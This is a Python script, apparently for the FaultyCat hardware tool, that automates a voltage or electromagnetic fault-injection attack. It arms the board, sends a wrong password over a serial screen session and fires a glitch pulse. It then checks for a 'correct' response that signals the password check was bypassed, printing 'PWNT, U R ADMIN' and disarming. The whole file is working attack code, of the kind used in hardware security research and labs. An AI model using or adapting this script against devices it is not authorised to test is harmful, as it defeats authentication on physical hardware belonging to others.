- import sys
- import time
- import pexpect # Required to handle screen sessions
- import threading
- from Modules import Worker
-
- DEFAULT_COMPORT = "/dev/ttyACM0"
- SCREEN_NAME = "ttyUSB0_screen" # Replace this with the actual screen session name
-
- # Initialize the FaultyWorker
- faulty_worker = Worker.FaultyWorker()
- # Shared variable to store the response from the device
- device_response = None
- child = None # Global child variable
-
- def initialize_child():
- """Initialize the global child process for the screen session."""
- global child
- child = pexpect.spawn(f'screen -x {SCREEN_NAME}', encoding='utf-8')
- child.expect(pexpect.TIMEOUT, timeout=1) # Clear out any pre-existing buffer
-
- def send_test_message_and_read_response():
- """Send 'ping' via screen to a serial device and check for 'correct!\\n' or 'incorrect\\n'."""
- global child
-
- # Send 'ping' to the screen session
- child.sendline("ping")
- sys.stdout.write("\rSent 'ping' to screen session.")
- sys.stdout.flush()
-
- # Wait a bit to ensure the command is processed
- time.sleep(0.5)
-
- # Try reading any new output from the screen session
- try:
- response = child.read_nonblocking(size=1024, timeout=2) # Read up to 1024 bytes of new data
- if "pong" in response:
- sys.stdout.write("\rReceived 'pong' response.")
- return True
- else:
- sys.stdout.write(f"\rReceived unexpected response: {response}")
- sys.stdout.flush()
- except pexpect.exceptions.TIMEOUT:
- sys.stdout.write("\rNo response received from the screen session (timeout).")
- sys.stdout.flush()
-
- return False
-
- def read_screen_output():
- """Read output from the screen session in a separate thread."""
- global device_response
- buffer = "" # Initialize a buffer to store incoming characters
-
- try:
- while True:
- response = child.read_nonblocking(size=1024, timeout=2) # Read up to 1024 bytes of new data
- buffer += response # Append the new response to the buffer
-
- # Check if there's a complete line in the buffer
- while "\n" in buffer:
- line, buffer = buffer.split("\n", 1) # Split the buffer at the first newline
- line = line.strip() # Remove any leading/trailing whitespace
-
- # Check for specific responses
- if "incorrect!" in line:
- #sys.stdout.write("\rReceived 'incorrect' response.")
- device_response = 'incorrect'
- return # Exit the loop on incorrect response
- elif "correct" in line:
- # Die here: Echo message, disarm device, and kill the program
- sys.stdout.write("\nReceived 'correct' response.\n PWNT, U R ADMIN\n Disarming the device and exiting...\n")
- sys.stdout.flush()
-
- # Disarm the board
- faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8"))
- faulty_worker.board_uart.close()
-
- # Exit the program
- sys.exit(0)
-
- else:
- sys.stdout.write(f"\rReceived unexpected response: {line}")
- sys.stdout.flush()
-
- except pexpect.exceptions.TIMEOUT:
- sys.stdout.write("\rNo response received from the screen session (timeout).")
- sys.stdout.flush()
- except Exception as e:
- sys.stdout.write(f"\rError reading from screen session: {e}")
- sys.stdout.flush()
-
- def send_pulse_and_check_response():
- """Send a pulse and check for 'correct!\\n' or 'incorrect\\n' response in parallel."""
- global device_response
- try:
- # Wait a bit to ensure the command is processed
-
-
- # Send 'incorrectPassword' command to the screen session
- sys.stdout.write("\rSending 'incorrectPassword' to screen session.")
- sys.stdout.flush()
- child.sendline("incorrectPassword")
-
- time.sleep(0.35)
-
- # Send 'pulse' command (simulating the pulse trigger)
- faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_PULSE.value.encode("utf-8"))
- sys.stdout.write("\rSent pulse...")
- sys.stdout.flush()
-
- # Start a thread to read the screen output
- reader_thread = threading.Thread(target=read_screen_output)
- reader_thread.start()
-
- # Wait for the reading thread to complete
- reader_thread.join()
-
- except Exception as e:
- sys.stdout.write(f"\rError interacting with screen session during pulse: {e}")
- sys.stdout.flush()
- return False
-
- def start_faulty_attack():
- """Send a pulse through the FaultyCat and listen for the response concurrently."""
- global child
- try:
- # Initialize the child process for screen session
- initialize_child()
-
- # Open FaultyCat connection
- faulty_worker.board_uart.open()
- time.sleep(0.1)
- sys.stdout.write("\rBoard connected.\n")
- sys.stdout.flush()
-
- # Arming the board
- sys.stdout.write("\r[*] ARMING BOARD, BE CAREFUL!\n")
- sys.stdout.flush()
- faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8"))
- time.sleep(1)
- faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_ARM.value.encode("utf-8"))
-
- sys.stdout.write("\r[*] ARMED BOARD.\n")
- sys.stdout.flush()
- time.sleep(1)
-
- # Sending pulses and checking responses in a loop (up to 5 times)
- max_iterations = 5
- for i in range(max_iterations):
- sys.stdout.write(f"\rLoop {i+1}/{max_iterations}: Sending pulse and checking response.\n")
- sys.stdout.flush()
-
- # Send the test message and check for pong
- if send_test_message_and_read_response():
-
- max_iterations_2 = 3
- for j in range(max_iterations_2):
- # Send pulse and check for correct/incorrect response
- if send_pulse_and_check_response():
- break # Break the loop if 'correct!' is received
-
- # Small delay before next iteration
- time.sleep(1)
-
- # Disarm the board
- sys.stdout.write("\rDISARMING BOARD. \n")
- sys.stdout.flush()
- faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8"))
- faulty_worker.board_uart.close()
- sys.stdout.write("\rBOARD DISARMED.\n")
- sys.stdout.flush()
- except Exception as e:
- sys.stdout.write(f"\rError: {e}\n")
- sys.stdout.flush()
- finally:
- # Make sure to clean up the child process
- if child:
- child.close()
-
- def faulty():
- """Configure and send pulses through the FaultyCat."""
- comport = DEFAULT_COMPORT
-
- print("Configuring the FaultyCat...")
- print(f"Using serial port: {comport}")
-
- # Set the serial port
- faulty_worker.set_serial_port(comport)
-
- # Validate the serial connection
- if not faulty_worker.validate_serial_connection():
- print(f"Error: Could not establish connection on: {comport}")
- return
-
- # Start the faulty attack (send pulse)
- start_faulty_attack()
-
- if __name__ == "__main__":
- print("Starting FaultyCat...")
- faulty()